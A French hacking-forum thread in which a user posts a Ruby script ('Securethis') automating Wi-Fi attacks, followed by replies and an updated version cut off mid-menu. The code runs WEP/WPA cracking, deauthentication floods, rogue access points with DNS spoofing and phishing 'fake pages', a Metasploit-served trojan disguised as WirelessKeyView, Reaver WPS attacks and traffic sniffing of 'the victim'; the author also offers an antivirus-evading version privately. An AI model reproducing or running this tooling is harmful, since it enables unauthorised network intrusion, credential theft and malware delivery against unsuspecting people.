Annonce

Réduire
Aucune annonce.

Securethis V1.0 script WEP/WPA

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • Securethis V1.0 script WEP/WPA

    Avant d'utiliser le code qui va suivre vous devez disposer des paquets suivants:

    ruby
    rubygems1.8
    rubygems1.9.1
    libgtk2-ruby1.8


    Je vous fais installer libgtk2-ruby1.8 et la 1.9.1 aussi car ma version de ruby est la 1.8.7, ça peu éviter des bugs et ça servira pour la V2 du tool.Pour les débutants dans le monde linux l'installe de ces paquets se fait dans le Gestionnaire de paquet synaptic

    Donnez des droit aux Fakes pages et aussi aux images que j'ai pompé par ci par la, le lien ci-dessous contient les fakes pages et un wirelesskeyview non FUD (pour le FUD c'est en MP que ça se passe)

    http://www.megaupload.com/?d=RE4PSVCY

    Le code maintenant:

    Code:
    #!/usr/bin/env ruby
    
     def menu 
      puts "##################    Coded By Flow (Koala)            #######"
      puts "##################    Pour crack-wifi.com              #######"
      puts "                  #########################                   "
      puts "                        #############                         "
      puts "                            #####                             "
      puts "                              #                               "
      puts "~~~~~~~~~~~~~~~~~~ 0 -Installation des elements           ~~~~"
      puts "~~~~~~~~~~~~~~~~~~ 1 -Crack de cle wep avec injection     ~~~~"
      puts "~~~~~~~~~~~~~~~~~~ 2 -Crack de cle wep avec -p0841        ~~~~"
      puts "~~~~~~~~~~~~~~~~~~ 3 -Crack de cle wpa avec dico          ~~~~"
      puts "~~~~~~~~~~~~~~~~~~ 4 -Crack wpa avec rogue AP et fakepage ~~~~"
      puts "~~~~~~~~~~~~~~~~~~ 5 -Crack wpa avec rogue AP et WKV      ~~~~"
      puts "~~~~~~~~~~~~~~~~~~ 6 -Boite a outils                      ~~~~"
    end
    menu
    opt=""
          while (opt!="0" && opt!="1" && opt!="2" && opt!="3" && opt!="4" && opt!="5" && opt!="6")
          puts "Choissisez votre options (entre 0 et 6)"
          opt=gets.chomp
    end
    
          if(opt=="0")
          puts "L'installation des elements utiles a la rogue va commencer, merci de patienter et de ne pas interrompre le processus, restez vigilent il se peut qu'on vous demande une confirmation pour l'installation des nouveaux paquets, si c'est le cas tapez Y pour Yes ou O pour Oui"
          sleep 10
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install dsniff &> /dev/null &")
          sleep 60
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install wireshark &> /dev/null &")
          sleep 90
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install dhcp3-server &> /dev/null &")
          sleep 90
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo apt-get install apache2 &> /dev/null &")
          sleep 150
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e apt-get install libapache2-mod-php5 &> /dev/null &")
    `sudo a2enmod php5`
    `sudo service apache2 restart`
    end
    menu
    
          if(opt=="1")
          puts "Repondez aux demandes du programme, faites attention a ne pas vous tromper"
          sleep 5
    `airmon-ng start wlan0`
    system ("ifconfig")
          puts "Rentrez l'adresse mac de votre carte wifi"
    mac=""
    mac=gets.chomp
    $mac=mac
    
          puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
          sleep 5
          system ("airodump-ng --encrypt wep mon0")
          puts "Rentrez un nom pour le fichier de capture"
    nom=""
    nom=gets.chomp
    $nom=nom
    
          puts "Rentrez le nom du reseau (ESSID)"
    essid=""
    essid=gets.chomp
    $essid=essid
    
         puts "Rentrez le canal du reseau (CH)"
    ch=""
    ch=gets.chomp
    $ch=ch
    
         puts "Rentrez l'adresse du reseau (BSSID)"
    bssid=""
    bssid=gets.chomp
    $bssid=bssid
    
    
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
    sleep 5
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -3 -e #{$essid} -a #{$bssid} -h #{$mac} -x 500 mon0 &> /dev/null &")
    sleep 1800
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng #{$nom}-01.cap &> /dev/null &")
    end
    
         if(opt=="2")
         puts "Repondez aux demandes du programme, faites attention a ne pas vous tromper"
    sleep 5
    system ("ifconfig")
         puts "Rentrez l'adresse mac de votre carte wifi"
    mac=""
    mac=gets.chomp
    $mac=mac
    
         puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
    sleep 5
    system ("airodump-ng --encrypt wep mon0")
         puts "Rentrez un nom pour le fichier de capture"
    nom=""
    nom=gets.chomp
    $nom=nom
    
         puts "Rentrez le nom du reseau (ESSID)"
    essid=""
    essid=gets.chomp
    $essid=essid
    
         puts "Rentrez le canal du reseau (CH)"
    ch=""
    ch=gets.chomp
    $ch=ch
    
         puts "Rentrez l'adresse du reseau (BSSID)"
    bssid=""
    bssid=gets.chomp
    $bssid=bssid
    
    
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
    sleep 5
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
    sleep 1800
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
    end
    
    
         if(opt=="3")
         puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
    sleep 5
    system ("airodump-ng --encrypt wpa mon0")
         puts "Rentrez un nom pour le fichier de capture"
    nom=""
    nom=gets.chomp
    $nom=nom
    
         puts "Rentrez le nom du reseau (ESSID)"
    essid=""
    essid=gets.chomp
    $essid=essid
    
         puts "Rentrez le canal du reseau (CH)"
    ch=""
    ch=gets.chomp
    $ch=ch
    
         puts "Rentrez l'adresse du reseau (BSSID)"
    bssid=""
    bssid=gets.chomp
    $bssid=bssid
    
         puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
    station=""
    station=gets.chomp
    $station=station
    
    
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 20 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
    sleep 18
    rep=""
         while rep!="oui" && rep!="non"
         puts "Le hanshake est-il capture? oui/non"
    rep=gets.chomp
         if rep=="oui"
    puts "Entrez le nom du dico a utiliser"
    dico=""
    dico=gets.chomp
    $dico=dico
    
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
    
         elsif rep=="non"
         puts "Lancement de mdk3"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid} &> /dev/null &")
    sleep 40
         puts "Maintenant entrez le nom du dico a utiliser"
    dico=""
    dico=gets.chomp
    $dico=dico
    
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
    else 
         puts "Choisissez une reponse valide"
          end
       end
    end
    
    
         if(opt=="4")
         puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
    sleep 5
    system ("airodump-ng --encrypt wpa mon0")
         puts "Rentrez le nom du reseau (ESSID)"
    essid=""
    essid=gets.chomp
    $essid=essid
    
         puts "Rentrez le canal du reseau (CH)"
    ch=""
    ch=gets.chomp
    $ch=ch
    
         puts "Rentrez l'adresse du reseau (BSSID)"
    bssid=""
    bssid=gets.chomp
    $bssid=bssid
    
         puts "Creation de la rogue AP"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -e #{$essid} mon0 &> /dev/null &")
    sleep 3
    `ifconfig at0 up`
    `ifconfig at0 10.0.0.1 netmask 255.255.255.0`
    `ifconfig at0 mtu 1400`
    `echo > dhcpd.leases`
    `iptables --flush`
    `iptables --table nat --flush`
    `iptables --delete-chain`
    `iptables --table nat --delete-chain`
    `route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
    `iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
    `iptables -P FORWARD ACCEPT`
    `iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
         puts "Regles iptables effectues, redemarrage de dhcp3"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
         puts "Mise en place de apache et dnsspoof"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
         puts "lancement de wireshark"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
    sleep 5
    down=""
         while down!="oui" && down!="non"
    puts "Pour downgrader le reseau cible utiliser mdk3 ou airbase? le resultat est le meme mais mdk3 va tenter de deconnecter la personne du reseau tandis qu'un second airbase va creer un reseau identique au reseau reel en lui prenant ses propres parametres de façon a ce qu'il ne puisse plus se connecter.Une croix rouge est cense s'afficher dans sa barre de reseau sans fil, vous ne pouvez lancer qu'un des 2 a la fois que choisissez vous? mdk3/airbase"
    down=gets.chomp
    
         if down=="mdk3"
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")
    
         elsif down=="airbase"
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")
    puts "Revenir au menu?"
    rp=gets.chomp
    else
         puts "Choisissez une reponse valide"
         end
      end
    end
    
    
         if(opt=="5")
         puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
    sleep 5
    system ("airodump-ng --encrypt wpa mon0")
         puts "Rentrez le nom du reseau (ESSID)"
    essid=""
    essid=gets.chomp
    $essid=essid
    
         puts "Rentrez le canal du reseau (CH)"
    ch=""
    ch=gets.chomp
    $ch=ch
    
         puts "Rentrez l'adresse du reseau (BSSID)"
    bssid=""
    bssid=gets.chomp
    $bssid=bssid
    
         puts "Creation de la rogue AP"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -e #{$essid} mon0 &> /dev/null &")
    sleep 3
    `ifconfig at0 up`
    `ifconfig at0 10.0.0.1 netmask 255.255.255.0`
    `ifconfig at0 mtu 1400`
    `echo > dhcpd.leases`
    `iptables --flush`
    `iptables --table nat --flush`
    `iptables --delete-chain`
    `iptables --table nat --delete-chain`
    `route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
    `iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
    `iptables -P FORWARD ACCEPT`
    `iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
         puts "Regles iptables effectues, redemarrage de dhcp3"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
         puts "Mise en place de apache et dnsspoof"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
         puts "Mise en place du trojan"
    sleep 3
    `cp -f /root/flowpa/WirelessKeyView.exe /tmp/WirelessKeyView.exe`
    Dir.chdir '/root/metasploit'
    `cd /root/metasploit`
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./msfconsole -r /root/flowpa/flowpa.rc &> /dev/null &")
    sleep 5
    down=""
         while down!="oui" && down!="non"
    puts "Pour downgrader le reseau cible utiliser mdk3 ou airbase? le resultat est le meme mais mdk3 va tenter de deconnecter la personne du reseau tandis qu'un second airbase va creer un reseau identique au reseau reel en lui prenant ses propres parametres de façon a ce qu'il ne puisse plus se connecter.Une croix rouge est cense s'afficher dans sa barre de reseau sans fil, vous ne pouvez lancer qu'un des 2 a la fois que choisissez vous? mdk3/airbase"
    down=gets.chomp
    
         if down=="mdk3"
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e mdk3 mon0 a -a #{$bssid}")
         elsif down=="airbase"
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -c #{$ch} -e #{$essid} -a #{$bssid} -I 600 -0 mon0 &> /dev/nul &")
    else
    puts "Choisissez une reponse valide"
        end
      end
    end
    
    
         if(opt=="6")
    puts "1 -Editer les fichiers essentiels au crack"
    puts "2 -Editer les fichiers log de apache"
    puts "3 -Faire une rogue AP transparente pour permettre a la victime de naviguer sur le net"
    puts "4 -Lister les fichiers et leurs droits respectif dans /var/www"
    choix=""
         while choix!="1" && choix!="2" && choix!="3"
    choix=gets.chomp
    
         if choix=="1"
    `gedit /etc/dhcp3/dhcpd.conf`
    `gedit /root/dns.txt`
    
         elsif choix=="2"
    `gedit /var/log/apache2/access.log`
    `gedit /var/log/apache2/error.log`
    
         elsif choix=="3"
         puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
    sleep 5
    system ("airodump-ng --encrypt wpa mon0")
         puts "Rentrez le nom du reseau (ESSID)"
    essid=""
    essid=gets.chomp
    $essid=essid
    
         puts "Rentrez le canal du reseau (CH)"
    ch=""
    ch=gets.chomp
    $ch=ch
    
         puts "Rentrez l'adresse du reseau (BSSID)"
    bssid=""
    bssid=gets.chomp
    $bssid=bssid
    
         puts "Creation de la rogue AP"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -e #{$essid} mon0 &> /dev/null &")
    sleep 3
    `ifconfig at0 up`
    `ifconfig at0 10.0.0.1 netmask 255.255.255.0`
    `ifconfig at0 mtu 1400`
    `echo > dhcpd.leases`
    `iptables --flush`
    `iptables --table nat --flush`
    `iptables --delete-chain`
    `iptables --table nat --delete-chain`
    `iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
    `iptables --append FORWARD --in-interface at0 -j ACCEPT`
    `iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1`
         puts "Regles iptables effectues, redemarrage de dhcp3"
    sleep 3
    system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
    puts "La victime peut surfer sur internet maintenant, soyez pas trop mechant :)"
    sleep 5
    
         elsif choix=="4"
         puts "Les fichiers present sont:"
    sleep 3
    system ("ls -l /var/www")
        end
      end
    end
    system ("ruby Securethis.rb")

    Enjoy

  • #2
    Excellent travail Koala ! Tu t'es donc mis au Ruby ! J'ai hâte de tester tout ça.

    Merde, c'est ton premier jour, et j'te donne déjà une note très élevée pour ce partage.

    +10 !

    Par contre je vais devoir passer cet outil en Level II ! Donc tu le retrouveras très bientôt une fois arrivé à 30 points de réputation, ce qui devrait se faire... demain^^

    Merci encore.

    Note : Modérateurs : déplacer dans Level II > Crack-wifi (une fois que koala a bien vu ce message ). Merci.
    sigpic

    Cyprium Download Link

    Plus j'étudie plus j'me rends compte que je n'sais rien.

    †|

    Commentaire


    • #3
      No problem et merci j'ai testé le script sur ma 10.04, il se peut qu'il y est des chemins a modifier si vous utiliser BT ;Eh oui je suis passer au ruby c'est quand meme mieux que le bash

      Commentaire


      • #4
        oulaaa... tu devrais chuchoter ça en ces lieux... ^^
        sigpic

        Cyprium Download Link

        Plus j'étudie plus j'me rends compte que je n'sais rien.

        †|

        Commentaire


        • #5
          Petit tuto de préparation avant de lancer le script:
          Code:
          sudo apt-get install ruby
          sudo apt-get install rubygems1.8
          sudo apt-get install rubygems1.9.1
          sudo apt-get install libgtk2-ruby1.8
          Ensuite on prend le code de install.rb qu'on copie dans un nouveau fichier nommé install.rb et on le lance:
          Code:
          ruby install.rb
          Soyez un peu patient et confirmez la demande d'installation de nouveaux paquets quand la console vous le demande.
          Une fois fait prenez le code de Securethis.rb et copiez le dans un fichier nommé Securethis.rb puis lancez le:
          Code:
          ruby Securethis.rb
          -Choisissez votre réseau
          -Ensuite aller dans "Setting" pour vérifier que vos fichiers de configuration sont correctes
          -Pour finir selectionnez l'option que vous voulez


          Vidéo d'explication: ici


          Code mis à jour:

          Code:
          #!/usr/bin/env ruby
          # encoding: utf-8
          
          require "rubygems"
          require "highline/import"
          
          puts "Make a good choice with airodump and press ctrl+c for next step"
          sleep 10
          system ("airmon-ng start wlan0")
          sleep 5
          system ("airodump-ng mon0")
          
          def wepinj
          system ("ifconfig")
                puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
          mac=""
          mac=gets.chomp
          $mac=mac
          
          puts "Le scan de reseau va se lancer, choisissez votre reseau et appuyez sur ctrl+c pour continuer"
          sleep 5
          system ("airodump-ng --encrypt wep mon0")
               puts "Rentrez un nom pour le fichier de capture"
          nom=""
          nom=gets.chomp
          $nom=nom
          
               puts "Rentrez le nom du reseau (ESSID)"
          essid=""
          essid=gets.chomp
          $essid=essid
          
               puts "Rentrez le canal du reseau (CH)"
          ch=""
          ch=gets.chomp
          $ch=ch
          
               puts "Rentrez l'adresse du reseau (BSSID)"
          bssid=""
          bssid=gets.chomp
          $bssid=bssid
          
          
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
          sleep 5
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
          sleep 1800
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
          end
          
          def wepp
          system ("ifconfig")
                puts "Now choose your MAC adress and press enter, warning to write as well the adress!"
          mac=""
          mac=gets.chomp
          $mac=mac
          
          puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
          sleep 5
          system ("airodump-ng --encrypt wep mon0")
               puts "Rentrez un nom pour le fichier de capture"
          nom=""
          nom=gets.chomp
          $nom=nom
          
               puts "Rentrez le nom du reseau (ESSID)"
          essid=""
          essid=gets.chomp
          $essid=essid
          
               puts "Rentrez le canal du reseau (CH)"
          ch=""
          ch=gets.chomp
          $ch=ch
          
               puts "Rentrez l'adresse du reseau (BSSID)"
          bssid=""
          bssid=gets.chomp
          $bssid=bssid
          
          
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -1 30 -e #{$essid} -a #{$bssid} -h #{$mac} mon0 &> /dev/null &")
          sleep 5
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b #{$bssid} -h #{$mac} mon0 &> /dev/null &")
          sleep 1800
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -P 1 #{$nom}-01.cap &> /dev/null &")
          end
          
          def wpadico
            puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
          sleep 5
          system ("airodump-ng --encrypt wpa mon0")
               puts "Rentrez un nom pour le fichier de capture"
          nom=""
          nom=gets.chomp
          $nom=nom
          
               puts "Rentrez le nom du reseau (ESSID)"
          essid=""
          essid=gets.chomp
          $essid=essid
          
               puts "Rentrez le canal du reseau (CH)"
          ch=""
          ch=gets.chomp
          $ch=ch
          
               puts "Rentrez l'adresse du reseau (BSSID)"
          bssid=""
          bssid=gets.chomp
          $bssid=bssid
          
               puts "Rentrez l'adresse de la personne connecte au reseau (STATION)"
          station=""
          station=gets.chomp
          $station=station
          
          
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng -w #{$nom} -c #{$ch} --bssid #{$bssid} mon0 &> /dev/null &")
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aireplay-ng -0 150 -a #{$bssid} -c #{$station} mon0 &> /dev/null &")
          sleep 148
          puts "Entrez le nom du dico a utiliser"
          dico=""
          dico=gets.chomp
          $dico=dico
          
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e aircrack-ng -w #{$dico} #{$nom}.cap &> /dev/null &")
          end
          
          def wparlocal
            puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
          sleep 5
          system ("airodump-ng --encrypt wpa mon0")
               puts "Rentrez le nom du reseau (ESSID)"
          essid=""
          essid=gets.chomp
          $essid=essid
          
               puts "Rentrez le canal du reseau (CH)"
          ch=""
          ch=gets.chomp
          $ch=ch
          
          
               puts "Creation de la rogue AP"
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
          sleep 3
          `ifconfig at0 up`
          `ifconfig at0 10.0.0.1 netmask 255.255.255.0`
          `ifconfig at0 mtu 1400`
          `echo > dhcpd.leases`
          `iptables --flush`
          `iptables --table nat --flush`
          `iptables --delete-chain`
          `iptables --table nat --delete-chain`
          `route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 &> /dev/null`
          `iptables -t nat -A PREROUTING -p udp --dport 53 -j DNAT --to 10.0.0.1`
          `iptables -P FORWARD ACCEPT`
          `iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1:80`
               puts "Regles iptables effectues, redemarrage de dhcp3"
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
               puts "Mise en place de apache et dnsspoof"
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
               puts "lancement de wireshark"
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
          end
          
          def wparinternet
            puts "Le scan de reseau va se lancer, choisissez votre réseau et appuyez sur ctrl+c pour continuer"
          sleep 5
          system ("airodump-ng --encrypt wpa mon0")
               puts "Rentrez le nom du reseau (ESSID)"
          essid=""
          essid=gets.chomp
          $essid=essid
          
               puts "Rentrez le canal du reseau (CH)"
          ch=""
          ch=gets.chomp
          $ch=ch
          
          
               puts "Creation de la rogue AP"
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -e #{$essid} mon0 &> /dev/null &")
          sleep 3
          `ifconfig at0 up`
          `ifconfig at0 10.0.0.1 netmask 255.255.255.0`
          `ifconfig at0 mtu 1400`
          `echo > dhcpd.leases`
          `iptables --flush`
          `iptables --table nat --flush`
          `iptables --delete-chain`
          `iptables --table nat --delete-chain`
          `iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE`
               puts "Regles iptables effectues, redemarrage de dhcp3"
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e /etc/init.d/dhcp3-server restart &> /dev/null &")
               puts "Mise en place de apache et dnsspoof"
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e sudo service apache2 restart &> /dev/null &")
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e dnsspoof -i at0 -f /root/dns.txt &> /dev/null &")
          sleep 3
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e wireshark &> /dev/null &")
          end
          
          def wps
          puts("Reaver with ten seconds between two request on the acces point.WARNING if reaver is not installed yet in the system you have to go here: http://www.linuxtrack.com/t1427-Installer-Reaver-sur-Ubuntu.htm  and follow the instructions")
          sleep 20
          
               puts "Rentrez l'adresse du reseau (BSSID)"
          bssid=""
          bssid=gets.chomp
          $bssid=bssid
          
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e reaver -i mon0 #{$bssid} -d 10 -vv &> /dev/null &")
          end
          
          def sergio
          puts("MAKE SURE THE FORWADING IS ENABLED (echo 1 > /proc/sys/net/ipv4/ip_forward)   Sergio is a powerful proxy open source and easy to use for capture any traffic in the web! for more information and download go to https://code.google.com/p/sergio-proxy/ special thanks to Antares145 and his tuto, can be found here: http://antaresnotebook.wordpress.com/2013/03/31/tuto-rogue-ap-episode-2-sniffing-de-base-et-un-peu-de-fun/")
          sleep 40
          system ("ifconfig")
               puts "Enter your ip adress"
          ip=""
          ip=gets.chomp
          ip=ip
          
          `iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to #{$ip}:10000`
          Dir.chdir '/root/sergio/sergio-proxy'
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e ./sergio-proxy.py -l 10000 -w /tmp/log.txt &> /dev/null &")
          end
          
          def hostapd
            puts("Hostapd access point mode, good to do a MITM more discreet (make sure your hostapd.conf has got a good configuration and the way to the folder is correct. to begin, remove the line driver=hostapd and replace it with driver=nl80211)")
          system ("xterm -hold -bg '#000000' -fg '#3A94FF' -e hostapd /etc/hostapd/hostapd.conf &> /dev/null &")
          end
          
          def deauth
            system ("ifconfig")
            puts("choose your network card to do the deauth (press enter if you want to use the same card as the rogue AP)")
          carte=""
          carte=gets.chomp
          $carte=carte
          
          system ("airmon-ng start #{$carte}")
          sleep 6
          system ("airodump-ng --encrypt wpa mon0")
          puts("enter the channel of the target network (CH)")
          canal=""
          canal=gets.chomp
          $canal=canal
          
          puts("enter the adress of the target network (BSSID)")
          bssid=""
          bssid=gets.chomp
          $bssid=bssid
          
          puts("enter the name of the file capture in airodump")
          name=""
          name=gets.chomp
          $name=name
          
          system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airodump-ng --#{$canal} --#{$essid} --output-format csv -w #{$name} mon0 &> /dev/null &")
          sleep 5
          system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airdrop-ng -i mon0 -t #{$name}.csv -r /root/rules.txt -b -p &> /dev/null &")
          end
          
          def planque
            puts "Airbase can find a hidden network too, you have to wait a little and the network will appear in your airodump-ng windows"
          sleep 15
          system("airodump-ng --encrypt wpa mon0")
          puts "Select the channel of the target network (CH)"
          ch=""
          ch=gets.chomp
          $ch=ch
          
               puts "Select the bssid of the target network (BSSID)"
          bssid=""
          bssid=gets.chomp
          $bssid=bssid
          
          system("airodump-ng -c #{$ch} --bssid #{$bssid} mon0")
          
               puts "Rogue access point with parameters of the hidden network is in active mode, see airodump and wait for the name of this network"
          sleep 10
          system("xterm -hold -bg '#000000' -fg '#3A94FF' -e airbase-ng -P -C 30 -c #{$ch} -a #{$bssid} -X mon0 &> /dev/null &")
          end
          
          def metasploit
              puts "BEFORE Lauching metasploit if you are on unbutu or other linux plateform make sure you have all the librairies to run properly metasploit.Lauching msfconsole, this could take a time...wait.Come back to Securethis menu pressing exit in msfconsole"
          sleep 20
          system("msfconsole")
          end
          
          def clean
              puts "Remove your index.html and php and all css present into /var/www and replace with the new files you choose CTRL+C TO ABORT NOW!"
          sleep 20
          `rm /var/www/index.php`
          `rm /var/www/index.html`
          `rm /var/www/valid.php`
          `rm /var/www/*.css`
          `rm /var/www/*.jpg`
          `rm /var/www/*.ico`
          
          puts "Now enter the name of your folder wich countain the fakes pages"
          name=""
          name=gets.chomp
          $name=name
          
          Dir.chdir '/root'
          `cp -rv #{$name} /var/www`
          end
          
          def settings
            puts "CHECK and EDIT: Important file needed for a good crack"
          sleep 10
          `gedit /etc/dhcp3/dhcpd.conf`
          `gedit /root/dns.txt`
          `gedit /etc/hostapd/hostapd.conf`
          `gedit /root/rules.txt`
          `gedit /var/log/apache2/access.log`
          `gedit /var/log/apache2/error.log`
          end
          
          begin
            puts
            loop do
              choose do |menu|
                menu.prompt = "Please select option"
            puts "##################    Coded By Flow (Koala)              #################"
            puts "##################    Securethis V1.1                    #################"
            puts "                  #########################                   "
            puts "                        #############                         "
            puts "                            #####                             "
            puts "                              #                               "
            puts "~~~Does your network is secure?~~~                            " 
            
                menu.choice(:Wepinjection, "injection.") { wepinj() }
                menu.choice(:Wepp0841, "-p0841.") { wepp() }
                menu.choice(:Wpabruteforce, "attaque par dico.") { wpadico() }
                menu.choice(:RogueAPlocal, "Rogue local seulement.") { wparlocal() }
                menu.choice(:RogueAPinternet, "Rogue avec internet.") { wparinternet() }
                menu.choice(:ReaverWPS, "Reaver.") { wps() }
                menu.choice(:Sniffing, "Utilisation de Sergio proxy.") { sergio() }
                menu.choice(:Hostapd, "Hostapd.") { hostapd() }    
